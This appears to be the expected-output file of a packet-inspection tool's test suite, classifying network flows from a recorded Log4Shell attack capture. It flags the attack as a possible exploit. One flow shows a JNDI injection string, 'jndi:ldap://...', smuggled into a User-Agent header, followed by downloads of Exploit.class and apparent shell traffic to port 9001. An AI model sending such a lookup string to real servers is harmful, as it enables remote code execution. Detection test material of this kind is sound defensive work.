tests/result/log4j-webapp-exploit.pcap.out


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

Guessed flow protos:	2

DPI Packets (TCP):	111	(15.86 pkts/flow)
Confidence Unknown          : 2 (flows)
Confidence DPI              : 5 (flows)

Unknown	356	25081	2
HTTP	34	6741	3
LDAP	32	2796	2

	1	TCP 172.16.238.10:48534 <-> 172.16.238.11:80 [proto: 7/HTTP][ClearText][Confidence: DPI][cat: Download/7][7 pkts/692 bytes <-> 6 pkts/1964 bytes][Goodput ratio: 30/79][0.00 sec][Hostname/SNI: 172.16.238.11][bytes ratio: -0.479 (Download)][IAT c2s/s2c min/avg/max/stddev: 0/0 0/0 1/1 0/0][Pkt Len c2s/s2c min/avg/max/stddev: 68/68 99/327 276/1420 72/494][URL: 172.16.238.11/Exploit.class][StatusCode: 200][Content-Type: application/java-vm][User-Agent: Java/1.8.0_51][Risk: ** Binary Application Transfer **** HTTP Numeric IP Address **** Possible Exploit Detected **][Risk Score: 510][PLAIN TEXT (GET /Exploit.class HTTP/1.1)][Plen Bins: 0,0,0,0,0,0,66,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,33,0,0,0,0,0]
	2	TCP 172.16.238.10:48444 <-> 172.16.238.11:80 [proto: 7/HTTP][ClearText][Confidence: DPI][cat: Download/7][6 pkts/624 bytes <-> 6 pkts/1964 bytes][Goodput ratio: 33/79][0.01 sec][Hostname/SNI: 172.16.238.11][bytes ratio: -0.518 (Download)][IAT c2s/s2c min/avg/max/stddev: 0/0 1/2 3/3 1/1][Pkt Len c2s/s2c min/avg/max/stddev: 68/68 104/327 276/1420 77/494][URL: 172.16.238.11/Exploit.class][StatusCode: 200][Content-Type: application/java-vm][User-Agent: Java/1.8.0_51][Risk: ** Binary Application Transfer **** HTTP Numeric IP Address **** Possible Exploit Detected **][Risk Score: 510][PLAIN TEXT (GGET /Exploit.class HTTP/1.1)][Plen Bins: 0,0,0,0,0,0,66,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,33,0,0,0,0,0]
	3	TCP 172.16.238.1:1984 <-> 172.16.238.10:8080 [proto: 7/HTTP][ClearText][Confidence: DPI][cat: Web/5][5 pkts/994 bytes <-> 4 pkts/503 bytes][Goodput ratio: 65/44][19.29 sec][Hostname/SNI: 192.168.13.31][bytes ratio: 0.328 (Upload)][IAT c2s/s2c min/avg/max/stddev: 1/7 4822/6428 10256/10256 4838/4568][Pkt Len c2s/s2c min/avg/max/stddev: 68/68 199/126 714/291 258/95][URL: 192.168.13.31:8080/log4shell/login][StatusCode: 200][Req Content-Type: application/x-www-form-urlencoded][Content-Type: text/html][User-Agent: jndi:ldap://172.16.238.11:1389/a][Risk: ** Known Protocol on Non Standard Port **** HTTP Numeric IP Address **** Possible Exploit Detected **][Risk Score: 310][PLAIN TEXT (POST /log)][Plen Bins: 0,0,0,0,0,0,50,0,0,0,0,0,0,0,0,0,0,0,0,0,50,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
	4	TCP 172.16.238.10:57650 <-> 172.16.238.11:1389 [proto: 112/LDAP][ClearText][Confidence: DPI][cat: System/18][9 pkts/739 bytes <-> 8 pkts/727 bytes][Goodput ratio: 16/24][17.91 sec][bytes ratio: 0.008 (Mixed)][IAT c2s/s2c min/avg/max/stddev: 0/5 2545/3580 17700/17700 6187/7060][Pkt Len c2s/s2c min/avg/max/stddev: 68/68 82/91 137/215 22/47][Risk: ** Known Protocol on Non Standard Port **][Risk Score: 50][PLAIN TEXT (objectClass)][Plen Bins: 51,16,16,0,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
	5	TCP 172.16.238.10:57742 <-> 172.16.238.11:1389 [proto: 112/LDAP][ClearText][Confidence: DPI][cat: System/18][9 pkts/739 bytes <-> 6 pkts/591 bytes][Goodput ratio: 16/30][0.02 sec][bytes ratio: 0.111 (Mixed)][IAT c2s/s2c min/avg/max/stddev: 0/0 2/1 11/2 4/1][Pkt Len c2s/s2c min/avg/max/stddev: 68/68 82/98 137/215 22/52][Risk: ** Known Protocol on Non Standard Port **][Risk Score: 50][PLAIN TEXT (objectClass)][Plen Bins: 51,16,16,0,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]


Undetected flows:
	1	TCP 172.16.238.10:55408 <-> 10.10.10.31:9001 [proto: 0/Unknown][ClearText][Confidence: Unknown][178 pkts/12940 bytes <-> 176 pkts/12009 bytes][Goodput ratio: 6/0][17.64 sec][bytes ratio: 0.037 (Mixed)][IAT c2s/s2c min/avg/max/stddev: 0/0 65/124 7288/7288 623/831][Pkt Len c2s/s2c min/avg/max/stddev: 68/68 73/68 78/89 3/2][Plen Bins: 100,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
	2	TCP 172.16.238.10:55498 <-> 10.10.10.31:9001 [proto: 0/Unknown][ClearText][Confidence: Unknown][1 pkts/76 bytes <-> 1 pkts/56 bytes][Goodput ratio: 0/0][0.00 sec][Plen Bins: 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]